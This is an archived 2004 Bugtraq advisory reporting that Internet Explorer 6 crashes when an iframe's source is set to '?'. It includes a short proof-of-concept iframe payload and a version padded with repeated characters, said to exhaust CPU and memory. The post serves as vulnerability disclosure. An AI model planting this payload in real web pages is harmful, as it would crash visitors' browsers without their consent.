[<prev] [next>] [day] [month] [year] [list]
Message-ID: <002201c41cbb$77aa7b60$6800a8c0@sec>
Date: Wed, 7 Apr 2004 17:14:54 +0100
From: "E.Kellinis" <me@...her.org.uk>
To: <bugtraq@...urityfocus.com>
Subject: Internet Explorer 6 - Crash
Formal Report
#########################################
Application: Internet Explorer
Vendors: http://www.microsoft.com
Version: 6.0.2800
Platforms: Windows
Bug: Crash(D.O.S)
Risk: Low
Exploitation: Local with browser
Date: 7 Apr 2004
Author: Emmanouel Kellinis
e-mail: me@...her(dot)org(dot)uk
web: http://www.cipher.org.uk
List : BugTraq(SecurityFocus)
#########################################
=======
Product
=======
A popular Web browser, created by Microsoft,
used to view pages on the World Wide Web.
===
Bug
===
Iframe element(TAG) creates an inline frame
that contains another document. If you use the
character '?' as the document , Internet explorer
starts an infinite loop of IFrames inside Iframes ,
this causes IE's crash.
=====================
Proof Of Concept Code
=====================
Create a web page and you add an IFRAME which
points to --> ?
Example : < iframe src= " ? " >
Crashes completely IE 6 in about 20 secs and consumes
more than 24 MBs of RAM and uses 99% of the CPU power.
Additionally, memory consumption and Crashing time
can vary , depending on how many characters you add
after the '?' character.
< iframe src= " ?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA " >
Emmanouel Kellinis
http://www.cipher.org.uk
=========================================================
*PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
=========================================================
Powered by blists - more mailing lists